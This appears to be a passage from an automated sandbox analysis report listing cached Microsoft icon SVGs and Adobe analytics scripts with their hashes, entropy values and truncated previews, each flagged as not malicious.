                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/MWF_SocialTwitter.png.svg?version=d2323c35-98f8-04ba-427f-b915c18959b7
                                                                                                                                                                                                              Preview: <svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32"><defs><style>.cls-1{fill:none;}.cls-2{fill:#231f20;}</style></defs><title>Twitter-neutral</title><rect class="cls-1" width="32" height="32"/><g id="_Group_" data-name="&lt;Group&gt;"><path class="cls-2" d="M27,9.17a9.37,9.37,0,0,1-2.26,2.34q0,0.32,0,.58a12.7,12.7,0,0,1-3.31,8.66,12.1,12.1,0,0,1-9.52,4.19A12.52,12.52,0,0,1,5,22.9,7.79,7.79,0,0,0,6.08,23,8.79,8.79,0,0,0,11.68,21a4.29,4.29,0,0,1-2.63-.9,4.43,4.43,0,0,1-1.59-2.23,4.64,4.64,0,0,0,.85.08,4.8,4.8,0,0,0,1.2-.15A4.4,4.4,0,0,1,6,13.41V13.35a5.69,5.69,0,0,0,2,.56,4.31,4.31,0,0,1-2-3.75,4.45,4.45,0,0,1,.59-2.28,12.29,12.29,0,0,0,9.28,4.72,5.12,5.12,0,0,1-.11-1,4.51,4.51,0,0,1,4.51-4.51,4.33,4.33,0,0,1,3.29,1.43,9,9,0,0,0,2.87-1.11,4.38,4.38,0,0,1-2,2.51A9.23,9.23,0,0,0,27,9.17Z"/></g></svg>
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\Prefooter_Icon-18_Support[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1230
                                                                                                                                                                                                              Entropy (8bit):4.3235255788059925
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:tu1jkD8d7JN6o4xS9hM0vfhgWlU38FaYmSs6juZsJ8:0j88d2Rxs+0G0+3quqy
                                                                                                                                                                                                              MD5:A9357B4791C45A090A37F6AFD94006C3
                                                                                                                                                                                                              SHA1:089E77B728743B3E5727D2A17D2AD812A4BB547F
                                                                                                                                                                                                              SHA-256:E9DE540DD5168537127EC5012D770302DD945F1C9BE533499146BD6FB0930794
                                                                                                                                                                                                              SHA-512:720E690C6A1BF34AA8250447501D958E06B07C6D9E8172B8567109C81BB2D3C8620446B17793A9996F65BF334C111DADAD7A121F75EA0427BE5AC089ADFD950D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Prefooter_Icon-18_Support.svg?version=4a9a4c35-089f-e35e-f8db-f08df9dd53b2
                                                                                                                                                                                                              Preview: <svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50"><defs><style>.cls-1{fill:#2f2f2f;}</style></defs><title>Prefooter_Vectors</title><path class="cls-1" d="M36.32,16.83q.15.67.24,1.34a10.69,10.69,0,0,1,.09,1.36,11.07,11.07,0,0,1-.93,4.6A13.14,13.14,0,0,1,33,28a10.62,10.62,0,0,0-2.18,3.14,9,9,0,0,0-.76,3.73v4.38a3.23,3.23,0,0,1-.26,1.28,3.27,3.27,0,0,1-1.74,1.74,3.23,3.23,0,0,1-1.28.26H22.43a3.23,3.23,0,0,1-1.28-.26A3.27,3.27,0,0,1,19.4,40.5a3.23,3.23,0,0,1-.26-1.28V34.84a9,9,0,0,0-.76-3.73A10.64,10.64,0,0,0,16.21,28a13.1,13.1,0,0,1-2.69-3.84,11.07,11.07,0,0,1-.93-4.6,11.93,11.93,0,0,1,1.64-6.07,12.28,12.28,0,0,1,4.32-4.32A11.94,11.94,0,0,1,33,10.9l-1.54,1.56a9.85,9.85,0,0,0-3.14-2.05,9.64,9.64,0,0,0-3.67-.72,9.53,9.53,0,0,0-3.83.78,9.91,9.91,0,0,0-5.24,5.24,9.52,9.52,0,0,0-.78,3.83,9,9,0,0,0,.76,3.73,10.61,10.61,0,0,0,2.18,3.14,12.76,12.76,0,0,1,2.42,3.35,11.4,11.4,0,0,1,1.09,4H28a11.77,11.77,0,0,1,1.09-4,12.4,12.4,0,0,1,2.43-3.35,10.63,10.63,0,
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\Prefooter_Icon-20_BlogWin[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1089
                                                                                                                                                                                                              Entropy (8bit):4.468502831358706
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:tu1jkD8d7ClcUqFh5n09uuMDY3e2HcrRZ4nUoZ3ek5FxZrrk8:0j88doIpn4u3DY3p1U3a/Hk8
                                                                                                                                                                                                              MD5:FB5BD5CFD29BF797C72FACEC2B369461
                                                                                                                                                                                                              SHA1:24952FF3DBF90886CEF395F399E7587D4D94AC05
                                                                                                                                                                                                              SHA-256:2240B138CEF57FF9F0BB7AA67BC0969CA756F406014227FA053F31C07E7CFEED
                                                                                                                                                                                                              SHA-512:D71E4FFFF6C66A7DB3602E6AA632FD7F0412CB1C62D1A20B3B5FF96CFEE6B8577051FD0E9B8216D8ACF965298602DCD779BF8600ADC8DD94A37F5C6B83040C08
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Prefooter_Icon-20_BlogWin.svg?version=3b1d197c-2139-50c4-563f-360f55c40234
                                                                                                                                                                                                              Preview: <svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50"><defs><style>.cls-1{fill:#2f2f2f;}</style></defs><title>Prefooter_Vectors</title><path class="cls-1" d="M38.48,16.4q.58,0,1.4-.07t1.7-.08a15.6,15.6,0,0,1,1.77.08,4.86,4.86,0,0,1,1.58.41,2.86,2.86,0,0,1,1.13.93,2.65,2.65,0,0,1,.44,1.59V39.33a2.78,2.78,0,0,1-.22,1.12A2.92,2.92,0,0,1,44.75,42a2.78,2.78,0,0,1-1.12.22H6.37A2.78,2.78,0,0,1,5.25,42a2.92,2.92,0,0,1-1.52-1.52,2.78,2.78,0,0,1-.22-1.12V19.27a2.78,2.78,0,0,1,.22-1.12,2.92,2.92,0,0,1,1.52-1.52,2.78,2.78,0,0,1,1.12-.22H25.85l7.28-7.28a4.52,4.52,0,0,1,1.44-1,4.34,4.34,0,0,1,1.71-.35A4.2,4.2,0,0,1,38,8.16a4.58,4.58,0,0,1,2.37,2.38,4.28,4.28,0,0,1,.36,1.74,4.44,4.44,0,0,1-.17,1.29,4.09,4.09,0,0,1-.47,1,6.15,6.15,0,0,1-.72.91Q39,15.93,38.48,16.4Zm5.15,2.87h-8L20.54,34.36,12.1,36.47,14.21,28,23,19.27H6.37V39.33H43.63Zm-7.35-8.6a1.53,1.53,0,0,0-1.12.47L16.8,29.5l-.76,3,3-.76L34.32,16.53s0-.07,0-.11.07-.05.1,0q.27-.27.85-.76t1.16-1.06a9.1,9.1,0,0,0
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RC0d8ee37d286a40e9a5bcfa5bffd8a963-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):572
                                                                                                                                                                                                              Entropy (8bit):5.237792552235126
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:jvgefYp5TIect/BefYp5TIDLgU985M7iKoufoAVNUwu7kan/:DYbTIect/BuYbTIoU985PugM6wu7Pn/
                                                                                                                                                                                                              MD5:E3E0335DF7D932261B78B597D8B273D4
                                                                                                                                                                                                              SHA1:9F519EBC7D24CD37A31BC374662A1AFA3F4DDDC0
                                                                                                                                                                                                              SHA-256:2343375779F0A1F9E346278313A638AFA50EE865D676B77DE2AF6100E4D9A32F
                                                                                                                                                                                                              SHA-512:A035DE2846ED76D27D8CA76E3DF442CBA6FC1242FD6B6D3533EAFE905FB1A8AF25722688D4AA5EF63A87EEC0369B21E380A7DB0224EEA16767F423B9AC0E2E74
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC0d8ee37d286a40e9a5bcfa5bffd8a963-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC0d8ee37d286a40e9a5bcfa5bffd8a963-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC0d8ee37d286a40e9a5bcfa5bffd8a963-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.comscore&&function(g,n){var i=function(){n.init()};g.category_all_status||g.category.analytics.status?i():g.category.analytics.queue.push(i)}(window.wdgtagging,window.wdgtagging.comscore,window.wdgtagging.util,window.jQuery);");
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RC4552f1fbf4374dc3b64139dd4e13d49e-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):9218
                                                                                                                                                                                                              Entropy (8bit):5.257040836712418
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:t1BO2s0Laz+Rk1cL3KWTR4hutuBbbx7UliY0paW0oI/bjFsWOqgfU:t1g3uY0xL3Km9UBbbxYlL5jW1lM
                                                                                                                                                                                                              MD5:D3EACD6E995CB02B84F2DE894EA56F55
                                                                                                                                                                                                              SHA1:0CADE5B0A48F393FB375CA2C3626528C4F8CB84C
                                                                                                                                                                                                              SHA-256:CB0905CA0D7898BF1BFB04E06493F3AE99FB30B7674C09AC2F0A501EB05567C5
                                                                                                                                                                                                              SHA-512:03206571D73676F48F6B7C23CFEF04EC3BD0E826050075E8BA774DFCDD4BBFF3D2FEEE2D9ACAFF263D7F7AC9A93FDA0F627E4987926FAB8BAABBD15C1788A20A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC4552f1fbf4374dc3b64139dd4e13d49e-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC4552f1fbf4374dc3b64139dd4e13d49e-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC4552f1fbf4374dc3b64139dd4e13d49e-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.jsll&&(window.wdgtagging.jsll.vt=window.wdgtagging.jsll.vt||{},function(t,e,o,a,c){var n,d;a.codeVersion=\"2017sep09v1\",a.checkpointCntnr=function(t,e,n){try{this.cpPercent=t,this.textValue=e,this.parentCntnr=n,this.hasFired=!1,\"start\"===this.textValue?this.behaviorVal=\"VIDEOSTART\":\"finish\"===this.textValue?this.behaviorVal=\"VIDEOCOMPLETE\":\"continue\"===this.textValue?this.behaviorVal=\"VIDEOCONTINUE\":\"pause\"===this.textValue?this.behaviorVal=\"VIDEOPAUSE\":this.behaviorVal=\"VIDEOCHECKPOINT\"}catch(i){o.debugLog(\"Error in the vt.checkpointCntnr function. Inside video tracking script. Error: \"+i)}},a.checkpointCntnr.prototype.fireEve
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RC58c82a547d344d07a51c8a4599f4cba7-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):7500
                                                                                                                                                                                                              Entropy (8bit):5.228324842442015
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:2BBfJ27VCkUbTh7MC0o3c1KOfamD8FQnfIrz9g7Hd:2BhwVCky708Fy
                                                                                                                                                                                                              MD5:D5BA7453260713460BBDDBCCF31F3E24
                                                                                                                                                                                                              SHA1:97DC16813E33DDE3C47B00D539EC4C2A12858944
                                                                                                                                                                                                              SHA-256:F32F316DC65A52379BDB6B400182B6263AB30D666C6042C24CD8AC4B7D5214DB
                                                                                                                                                                                                              SHA-512:A5FE0AF1BB143BDAB81ACC006BF64D4FA1BC97170F60DA32FA611B724ADD295B38D5CE68E3BA87EC75D91E9E0DAC3CEE6631859C0FC2FA20F4B3BE00971B33D0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC58c82a547d344d07a51c8a4599f4cba7-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC58c82a547d344d07a51c8a4599f4cba7-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC58c82a547d344d07a51c8a4599f4cba7-source.min.js', "null!=window.wdgtagging&&(window.wdgtagging.jsll=window.wdgtagging.jsll||{},function(e,u,r){u.lineage={main_sel:\"MAIN\",zone_id:\"a3\",sec_custom_sel:\"\",grp_custom_sel:\"\",pnl_custom_sel:\"\",subpnl_custom_sel:\"\",exclude_sec_sel:\"\"},r.isDebug=!1,u.lineageSetupCounter=1,\"1\"===r.readCookie(\"debug\")?r.isDebug=r.readCookie(\"debug\"):-1<location.search.indexOf(\"debug=1\")&&(r.isDebug=!0),r.lineageDebug=function(e){r.isDebug&&console.log(e)},r.lineageDebug(\"JSLL Core Lineage Start\"),r.getLineageName=function(e,a){return e.attr(\"data-lineage-name\")||e.attr(\"data-productid\")||e.attr(\"data-bigid\")||e.attr(\"data-id\")||e.attr(\"data-vg\")||e.attr(\"id\")||a},r.resetLineageName=functi
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RC634e263982fb4aa0a4ce1c92868d1637-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1204
                                                                                                                                                                                                              Entropy (8bit):5.350937549762304
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:DpZct/BupzbElAh33YxsA9fi5a+1QPRuJjeRmGa3wuKIPn/:DpGt/Bupzg6gfWavOtr
                                                                                                                                                                                                              MD5:83CEB8EBAAB6D99E9197660E28127566
                                                                                                                                                                                                              SHA1:484C25C9D3347832506E9267F09AF8CE461EE11F
                                                                                                                                                                                                              SHA-256:18196D6F565C161802E4E035B4C9641B847E07A83614C8DB5C8587AC1B6E0C3C
                                                                                                                                                                                                              SHA-512:F53C976284D37A78AEC26370838831AD5318325F80D95228262D483E4415D84F3DA148223F864FB1C13708F307F853C1AE972310D51F95541CF1371AA7875BFC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC634e263982fb4aa0a4ce1c92868d1637-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC634e263982fb4aa0a4ce1c92868d1637-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC634e263982fb4aa0a4ce1c92868d1637-source.min.js', "null!==window.wdgtagging&&null!==window.wdgtagging.jsll&&function(t,n,i,s){n.loadJSLL=function(){var a,e,g={appId:\"surface\",version:\"4\",coreData:{env:t.getData(\"env\"),market:t.getData(\"langLoc\"),pageName:t.getData(\"gpn\"),pageType:t.getData(\"pageType\")}};(\"undefined\"!=typeof isUserSignedIn&&\"1\"===isUserSignedIn||s(\".msame_TxtTrunc.msame_Drop_active_name\").length)&&(g.isLoggedIn=!0),location.pathname.match(/\\/surface\\/business(|\\/.*)$/gi)&&(g.appId=\"surfaceforbusiness\"),g.prePageView=(a=t,e=i,function(){e.setMetaTag(\"awa-env\",a.getData(\"env\")),e.setMetaTag(\"awa-market\",a.getData(\"langLoc\")),e.setMetaTag(\"awa-pageName\",a.getData(\"gpn\")),e.setMetaTag(\"awa-pageType\
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RC96777c2ebe84414286bf080548aff3f0-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1300
                                                                                                                                                                                                              Entropy (8bit):5.450032917226247
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:Drm4xwct/Burm4x2UlwkxaxsP1mMOZB0F1zM2oB0F1zMUQSJO+gX3ZZg1za5QShP:DC4xt/BuC4cOnW/2o/UQOO+gjd5QYek7
                                                                                                                                                                                                              MD5:806A6AC7C7CFB53510C30C9297008BC4
                                                                                                                                                                                                              SHA1:1D29CC1221E0F1A2BDFA840D6A64C7A1CDFDE016
                                                                                                                                                                                                              SHA-256:6632357D32D1BC02AC3C099CEB2AFFAA18B6C1A84D5646969EEA0DB46929A099
                                                                                                                                                                                                              SHA-512:AB32C2E93C7AC5210CFB39BEFD887AB8C6A69AA67E5604F34F3B004DD858019CA22B82BBE7D724694D49D517652DCA7447F34BA56CC1F9E3E66E38D28AAB3A63
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC96777c2ebe84414286bf080548aff3f0-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC96777c2ebe84414286bf080548aff3f0-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC96777c2ebe84414286bf080548aff3f0-source.min.js', "null!=window.wdgtagging&&(window.wdgtagging.jsll=window.wdgtagging.jsll||{},function(n){var i=[];if(jQuery(\"[id*='ContentBlockList']\").each(function(){try{jqthis=jQuery(this),0<jqthis.find(\"a\").length&&jqthis.not(\"[data-sec]\")&&(0<jqthis.find(\"[id*='ContentBlockList']\").length?jqthis.find(\"[id*='ContentBlockList']\").each(function(){jQuery(this).find(\"a, button\").length<=0&&i.push(jqthis)}):i.push(jqthis)),0<jqthis.find(\"button\").length&&jqthis.not(\"[data-sec]\")&&(0<jqthis.find(\"[id*='ContentBlockList']\").length?jqthis.find(\"[id*='ContentBlockList']\").each(function(){jQuery(this).find(\"a, button\").length<=0&&i.push(jqthis)}):i.push(jqthis))}catch(t){n.debugLog(\"Error in ms.i
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RCa54691479cfd480e8966b36c0e24cb24-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1214
                                                                                                                                                                                                              Entropy (8bit):5.4734413400164845
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:Dract/BurMU9Cthmb0MxATIBK1Qq4PvE1Lysi8swuIPn/:D1t/Buwtmb1GTI02P+BBsA
                                                                                                                                                                                                              MD5:8DA86376CC124043CF39439246DCE673
                                                                                                                                                                                                              SHA1:48A5C1BCBE12D9D55F66A231BBE56331A0BB2A97
                                                                                                                                                                                                              SHA-256:75DB12D91051B06F5E2C8B13062A07CBFFD597915EF8AF8E8AF4F79AF1EAF901
                                                                                                                                                                                                              SHA-512:2746882D839B6125F178766A61C58A58D6A030AA7E2FD336430F0EF149BA9FCDE9C044648254CADF85E625E9FB1ADFFDC0FAE43FC8E2714DC4E082982616C288
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCa54691479cfd480e8966b36c0e24cb24-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCa54691479cfd480e8966b36c0e24cb24-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCa54691479cfd480e8966b36c0e24cb24-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.dcm&&function(n,t,e,a){var g=function(){var n=window.location.pathname;n.match(/\\/(en-gb|en-us|pt-br|es-MX|fr-fr|de-de|en-au|en-ca|fr-ca)\\/xbox-game-pass\\/pc-games\\/?/gi)&&window.location.host.match(/www.xbox.com/i)&&(t.xgpGenericSrc=\"8406391\",t.xgpGenericType=\"xgpg\",t.xgpCatDownload=\"dwln_std\",a(document).on(\"mousedown\",\"a[href*='https://aka.ms/XboxInstaller'], a[href*='XboxInstaller.exe'], button[data-cta-href*='XboxInstaller.exe']\",function(){t.trackEvent(t.xgpGenericSrc,t.xgpGenericType,t.xgpCatDownload,null,this)})),n.match(/\\/(en-us|en-gb|pt-br|es-MX|fr-fr|de-de)\\/?$/gi)&&window.location.host.match(/www.xbox.com/i)&&t.trackVie
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RCa554a28b04b64d7381f998c374c46687-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1538
                                                                                                                                                                                                              Entropy (8bit):5.351434556547034
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:DrRct/Bur7Ulwkxa5y8my1dzyxw1KEQIDG0mfAl+ekMPROrMmy1u5+CXGtmTAUFL:DSt/BuvOnZFfi1LQ13Y0rVe4Zj0W
                                                                                                                                                                                                              MD5:5109BB2C22A7F9789FD6AF640CFE3E63
                                                                                                                                                                                                              SHA1:ACB3CF9CCDF0CD3CC72C74CB41CC326581699768
                                                                                                                                                                                                              SHA-256:30F1A87FE01C8DBC65D2F3E4656714FBFE604FE51591B2CE77771B655E6BFFE8
                                                                                                                                                                                                              SHA-512:6A07146E4EC7B30B95213FE31981A4826F975F57B4C9D19F0E9B1E6C2326DF835E05AED3654085FC7B3BCD19853C6F1987C6C806F9E3BD89811D5508584E6B98
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCa554a28b04b64d7381f998c374c46687-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCa554a28b04b64d7381f998c374c46687-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCa554a28b04b64d7381f998c374c46687-source.min.js', "null!=window.wdgtagging&&(window.wdgtagging.jsll=window.wdgtagging.jsll||{},function(a,t,r){var o;jQuery(\"div.accordion li\").each(function(){try{o=jQuery(this);var a=jQuery.trim(jQuery(\"h3\",o).text())||jQuery.trim(o.attr(\"aria-label\"));o.attr({\"data-bi-name\":a.toLowerCase(),\"data-bi-slot\":o.index()+1})}catch(t){r.debugLog(\"Error tagging Accordion section. Error: \"+t)}}),jQuery(\"div.accordion li\").click(function(){try{var a=jQuery(this);if(a.attr(\"class\")!=a.attr(\"data-lastClass\")&&\"expanded\"==a.attr(\"class\")){var t={behavior:awa.behavior.EXPAND,actionType:\"CL\"};awa.ct.capturePageAction(this,t)}jQuery(\"div.accordion li\").each(function(){var a=jQuery(this);a.attr(\"data-la
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RCaddf5b92826f455eb4626aa9f87fb1b7-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4711
                                                                                                                                                                                                              Entropy (8bit):5.330456218960773
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:ESBBrAVnNQilOWmAeOxoFFHFNL2F+L2FC:xBwnNQqJZxoFFHiFVFC
                                                                                                                                                                                                              MD5:F850D969E340A956BB948A9B8EADF35B
                                                                                                                                                                                                              SHA1:57DFD647B55430BE05AA8D92362FB164D70DDF69
                                                                                                                                                                                                              SHA-256:65C8BE9CA3903EC8642CC9EB8CDD3D60754ED99CF5D518DCA781199F8FC6DC91
                                                                                                                                                                                                              SHA-512:A532760CA137179FDC90594F0E220F79911F6E7251ABA5AC6A93E2B43CB4242A1BD05AD3D77C829A3A29EF4809D027E85A6B0B54319850CC05012819F5C0139D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCaddf5b92826f455eb4626aa9f87fb1b7-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCaddf5b92826f455eb4626aa9f87fb1b7-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCaddf5b92826f455eb4626aa9f87fb1b7-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.jsll&&function(e,a,t){var i,s,r,c,n,d=location.pathname,o=\"MAIN\";d.match(/\\/surface\\/business\\/extended-service-warranty/i)?o=\"MAIN>DIV.cfb\":d.match(/\\/surface\\/devices\\/surface\\-pro\\/overview/i)?o=\"MAIN>DIV.surfacecom\":d.match(/\\/surface\\/devices\\/surface\\-pro\\/tech\\-specs/i)?o=\"MAIN>DIV.surfacecom\":d.match(/\\/surface\\/devices\\/surface\\-pro\\/for\\-business/i)?o=\"MAIN>DIV.pmp-devices\":d.match(/\\/surface\\/accessories\\/surface-dial/i)?o=\"MAIN>DIV#surface-accessories-dial\":d.match(/\\/surface\\/accessories\\/?/i)?o=\"MAIN>DIV#surfaceAllAccessories_Browse\":d.match(/\\/surface\\/devices\\/help\\-me\\-choose/i)?o=\"MAIN
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RCb1b9b3db2cdd45cf98521fb2fd2b132b-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):5249
                                                                                                                                                                                                              Entropy (8bit):5.2362205554691705
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:GBB7aSi77a29c9pgO29Y8WNUQEimDaimItA:GBlaSi77e69Y8W9mDDA
                                                                                                                                                                                                              MD5:883CA7CD4695118BA61ADEB1843C494D
                                                                                                                                                                                                              SHA1:BEA97A036E9467CFDF5711224B38C9C1F9FFE465
                                                                                                                                                                                                              SHA-256:84F51DF865E43B65FC93952CF3F2C268C48A543BCFFDDFD8808925E107B87B9D
                                                                                                                                                                                                              SHA-512:842E1BE77A92C29C1C740D6F8E9AF2A1ADA375980176049743EF56C7E7A7CBD99B85C4C98BFD2C9309DEA91A1B69958540F74FC9A7E616935FF6201C3A39FB00
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCb1b9b3db2cdd45cf98521fb2fd2b132b-source.min.js
